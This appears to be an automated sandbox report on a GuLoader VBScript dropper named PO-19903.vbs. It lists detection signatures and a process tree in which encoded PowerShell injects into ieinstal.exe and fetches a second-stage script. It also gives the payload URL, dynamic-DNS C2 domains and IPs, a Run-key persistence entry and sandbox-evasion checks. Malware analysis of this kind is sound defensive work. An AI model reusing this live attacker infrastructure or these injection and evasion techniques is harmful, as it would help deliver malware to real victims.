Windows Analysis Report
PO-19903.vbs

Overview

General Information

Sample Name: PO-19903.vbs
Analysis ID: 625175
MD5: 0347b27843d88f73fdcd4dadb95549ac
SHA1: 2a2d6bcd2d83833d501b9695921855e1992f6ec8
SHA256: 1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64native
  • wscript.exe (PID: 5568 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 9096 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 5172 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 6856 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 8904 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • wscript.exe (PID: 2852 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
          • powershell.exe (PID: 7456 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}
Source: 00000001.00000003.3931911051.0000018888A71000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_LNK_SuspiciousCommands
Description: Detects LNK file with suspicious content
Author: Florian Roth
Strings:
  • 0x1eaa:$s12: Wscript.Shell

Source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    AV Detection

    Source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}
    Source: PO-19903.vbs ReversingLabs: Detection: 19%
    Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
    Source: vegproworld.com Virustotal: Detection: 5%
    Source: unknown HTTPS traffic detected: 148.66.138.165:443 -> 192.168.11.20:49738 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.11.20:49739 version: TLS 1.2
    Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.pdb source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp

    Networking

    Source: Initial file: Matri11.SaveToFile FileName, adSaveCreateOverWrite
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Dropped file: MILIEUFOR1.SaveToFile FileName, adSaveCreateOverWrite
    Source: Malware configuration extractor URLs: https://vegproworld.com/wp-content/Touchb.vbs
    Source: unknown DNS query: name: toshiba1122.ddns.net
    Source: unknown DNS query: name: toshiba1122.duckdns.org
    Source: Joe Sandbox View ASN Name: VCG-ASNG
    Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox View IP Address: 13.107.43.13
    Source: Joe Sandbox View IP Address: 148.66.138.165
    Source: global traffic HTTP traffic detected:
        GET /wp-content/Touchb.vbs HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: vegproworld.com
        Cache-Control: no-cache
    Source: global traffic HTTP traffic detected:
        GET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: onedrive.live.com
        Cache-Control: no-cache
        Cookie: MUID=20718A960FA8687F03949A000BA86C7A
    Source: global traffic TCP traffic: 192.168.11.20:49741 -> 194.5.98.59:3360
    Source: global traffic TCP traffic: 192.168.11.20:49742 -> 197.210.226.45:3360
    Source: global traffic TCP traffic: 192.168.11.20:49752 -> 197.210.226.89:3360
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.4973562589.00000000059A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jgdbpa.am.files.1drv.com/
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1Y
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4444820883.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8459529246.0000000002C3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jgdbpa.am.files.1drv.com/y4mstf71DnOKqqDiI505gr5x-9GCiHWv5DdrHG7ALTidojrV4lxxrd7sQ3eLTcarbaq
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/:
    Source: ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304
    Source: ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/ndows
    Source: ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vegproworld.com/:k
    Source: ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vegproworld.com/rj-$
    Source: ieinstal.exe, 00000009.00000002.8457894075.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vegproworld.com/wp-content/Touchb.vbs
    Source: unknown DNS traffic detected: queries for: vegproworld.com

    System Summary

    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
    Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 19732
    Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 17348
    Source: 00000001.00000003.3931911051.0000018888A71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0505E827
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0505E858
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_085E3AF0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_085E5140
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_085E2772
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_085EDB20
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_085E3798
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08636F58
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_086330B0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0863309E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_086758E0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08678129
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08678138
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08747888
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08740040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08740012
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0874B1EF
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0874B210
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_087F9140
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_087FF298
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_087F3C98
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_087F3C8A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08F60942
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08F62A90
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08F61CC8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08F6C8F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08F6E8A8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0867C741
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process Stats: CPU usage > 98%
    Source: PO-19903.vbs Initial sample: Strings found which are bigger than 50
    Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edgegdi.dll
    Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs"
    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220512
    Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\OVER.dat
    Source: classification engine Classification label: mal100.troj.evad.winVBS@15/12@15/5
    Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Mutant created: \Sessions\1\BaseNamedObjects\oMDTItPV
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8852:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8852:120:WilError_03
    Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.pdb source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    Source: Yara match File source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_085EB2FE push eax; iretd 2_2_085EB2FF
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_085EB4F6 pushad ; iretd 2_2_085EB4F7
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08639C98 pushfd ; ret 2_2_08639E0D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08639DF0 pushfd ; ret 2_2_08639E0D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08670028 push esp; retf 2_2_08670031
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_086731AC pushad ; iretd 2_2_086731AD
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0874FB90 push 00000008h; ret 2_2_0874FBA0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0874A200 push 00000008h; ret 2_2_0874A210
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_087F58D0 push eax; retf 2_2_087F58D1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_087F43E8 pushad ; ret 2_2_087F43E9
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_087F44F0 pushfd ; ret 2_2_087F44F1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08F692E2 push eax; mov dword ptr [esp], edx 2_2_08F692F4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dll
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Denialsch
    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 392 Thread sleep count: 81 > 30
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 392 Thread sleep time: -6075000s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8057
    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread delayed: delay time: 75000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
    Source: ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 630000
    Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra Skan
    Source: C:\Windows\SysWOW64\wscript.exe Process created: Base64 decoded #meso dittog stjerthage Prevaricat1 Pyrol6 delumini Tastear7 tropo engr nonrepenta #Smitty1 SPRENG UNVIS Allerhv Archip9 RINGMRKNI Uncon9 JENBRY Ejakule STJER KOMMUNIK Sortk8 phae Uqvsy Monop3 Countercl1 baalambs Explosibl EPIGR Cephalohum tegnt GPSEMULS Aflaas6 Asbk6 #abidi Peng9 apha Caulkers TRFFE Typhoonto3 krapinaf Enligsti2 Sankthans Gennem8 Celiec6 Katj #Epilepsien SEMISOLU sprednin METHY Parame Brnehave2 GERMANIST DRETSS ENSPORETH Stedmod7 Svovlsyre Borgerr Kolport1 pleurot #bonsai Pseudo fritidscen TEATERGN PLANERS VINDM Spalte Tabel2 Ambadeedie Cindersban Coatt3 CHROMAT carl Stift1 stvfn Kommuna3 RRTAN Nonoil #septenat Pseudoamb8 Nonracia Vlgeresk3 Dogho Programm FLUGTSKYD claust SELVFIN #dispens AFFALDSP Plnerner Gordykn1 Bioel Rhiz Nonadja9 Bris2 STUD korporligt Charcuti2 Maltingpe6 Sikkerh3 UNITINGIN disens #SPIS strykni Treasure2 freez Disorde Cifferfl metages Ustemp efterkomm Synsms4 LNSLAVESR Cats4 sovs Wins Precepta7 TARSOMAL Obsternasi4 EFTERTR Bleskud2 #woolensr PLOCEIFORM Rauno TYPER innuendo RAPP Bogstavk ubes Absinth Forsknin HOTELVRT Skinn bedriften BROK forskudsb Misi Auma6 Mossernes #Hemihyperi Aikos makrofu pillmaking Habanerasd Trol6 RYGTIKAMPE TRFLERNEPO modstands Dynami pulvin Hysterecto1 Mtni chart LEMMATAAN Knsk6 filstrukt #KOERSLE STYREVARIA Blnde Sedim4 CROS DUELLERE krummesu Pseudop sher Standhaf forve Skatteafde REVERSA TRILLIONTA Prrie Hvid Damr1 Unsu9 sanjaspew flyde LINGUOVERS Respo9 #tilf Shotgunaf6 Zuniss2 b
    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[base64-encoded command omitted]"
